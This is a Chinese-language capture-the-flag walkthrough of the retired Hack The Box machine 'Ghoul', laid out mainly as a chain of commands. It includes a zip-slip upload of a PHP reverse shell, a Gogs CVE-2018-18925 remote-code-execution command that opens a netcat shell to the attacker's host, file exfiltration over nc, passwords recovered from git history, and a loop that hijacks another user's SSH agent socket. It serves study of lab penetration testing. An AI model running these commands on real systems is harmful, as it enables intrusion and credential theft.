本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机是作者购买VIP使用退役靶机操作,显示IP地址为10.10.10.101
本次使用https://github.com/Tib3rius/AutoRecon 进行自动化全方位扫描
执行命令 autorecon 10.10.10.101 -o ./Ghoul-autorecon
此靶机难度不小,官方想显示难度如下
根据扫描结果开放了4个端口,根据以往的经验,难度较大的靶机会有docker环境,目的让你从docker环境逃逸跳转到宿主机拿到最终的root.txt,这里我们先看下80端口
把上面的功能都点击了一把,没发现啥鸡毛东西,直接目录爆破看看
发现了重要敏感目录,具体如下
其他访问都是现实403,我们先放着看下开放的8080端口,访问8080端口的时候我还是绑定hosts 访问,这里访问的时候显示401认证,我尝试了弱口令admin/admin登录此成功,显示如下界面
发现了上传功能, 上传照片显示成功,但是通过上面的爆破目录uploads显示404,不在此处浪费时间,我们看看另一个上传点
此上传点可以上传zip压缩文件,得知存在zip slip漏洞,具体参考:Zip Slip Vulnerability | Snyk 对应的exploit GitHub - ptoomey3/evilarc: Create tar/zip archives that can exploit directory traversal vulnerabilities
漏洞zip-slip详情 https://snyk.io/research/zip-slip-vulnerability 对应的exploit https://github.com/ptoomey3/evilarc 反弹shell代码 wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php python evilarc.py -o unix -d 2 -p var/www/html/archives revshell.php curl http://10.10.10.101/archives/revshell.php nc -lvnp 8833
拿到权限通过枚举当前系统的信息,得到如下
发现3个私钥文件,有一个私钥文件加了密码,猜测加了密码的就是有可能是权限较大的用户,回看前面访问的web页面10.10.10.101/secret.php得到私钥密码ILoveTouka 所以直接将私钥复制到本地kali更改权限600直接连接上去
通过 查看当前用户的.ssh目录发现和另外一台主机是互信的,于是直接连接上去
进入到此主机进行C段探测
for i in {1..255}; do ping -c 1 172.18.0.$i; done | grep 'ttl='
发现172.18.0.2存在gods,开放3000端口,将其3000端口通过端口转发到本地kali
通过ssh进行本地端口转发 ssh -L 3000:172.18.0.2:3000 kaneki_pub@172.20.0.150 本地kali执行,将3000端口转发到本地kali ssh -L 3000:127.0.0.1:3000 -i kaneki.key kaneki@10.10.10.101
Gogs漏洞详情 https://www.anquanke.com/post/id/163575 https://nvd.nist.gov/vuln/detail/CVE-2018-18925
对应Gogs的exploit
https://github.com/TheZ3ro/gogsownz
直接利用
python3 gogsownz.py -v http://127.0.0.1:3000/ -C 'AogiriTest':'test@aogiri123' -n i_like_gogits --rce 'nc 10.10.14.3 1337 -e /bin/sh' --cleanup
成功反弹shell,在此shell的基础上写入公钥,然后通过私钥连接过去
拿到root权限之后到root根目录发现压缩文件,通过nc的方式将其下载到kali本地
nc传文件 nc -lvnp 5555 > aogiri-app.7z nc 10.10.14.3 5555 < aogiri-app.7z 解压 7z x aogiri-app.7z
在kali本地查看解压的文件内容
到解压后的文件夹里面执行下面命令查看更改提交日志 git log -p # -p is for pagination spring.datasource.url=jdbc:mysql://172.18.0.1:3306/db -spring.datasource.username=root -spring.datasource.password=root +spring.datasource.username=kaneki +spring.datasource.password=jT7Hr$.[nF.)c)4C git reflog -p 用法参考:https://git-scm.com/docs/git-reflog server.port=8080 spring.datasource.url=jdbc:mysql://localhost:3306/db -spring.datasource.username=kaneki -spring.datasource.password=7^Grc%C7xEQ?tb4 +spring.datasource.username=root +spring.datasource.password=g_xEN$ZuWD7hJf2G 发现上面的密码信息,一个一个试,确认密码7^Grc%C7xEQ?tb4可以切换root
知道了密码切换到root权限
发现有个计划任务连接IP地址172.18.0.1,确认可以通过ssh-agent可以直接进行登录,参考:https://www.ssh.com/ssh/agent 这里测试由于生成的agent信息很快就会被删除了,所以需要使用循环的方式拿到权限
while true; do export pid=$(ps -u kaneki_adm | grep ssh$ | tr -s ' ' | cut -d' ' -f2); if [ ! -z $pid ]; then echo "[+] Found pid for kaneki_adm ssh process: $pid"; export SSH_AUTH_SOCK=$(su kaneki_adm -c 'cat /proc/${pid}/environ' | sed 's/x0/ /g' | grep SSH_AUTH_SOCK | cut -d'=' -f2); echo "[+] Found ssh auth socket: $SSH_AUTH_SOCKET"; echo "[*] sshing to target"; ssh root@172.18.0.1 -p 2222; break; fi; sleep 5; done
最终拿到权限获取root.txt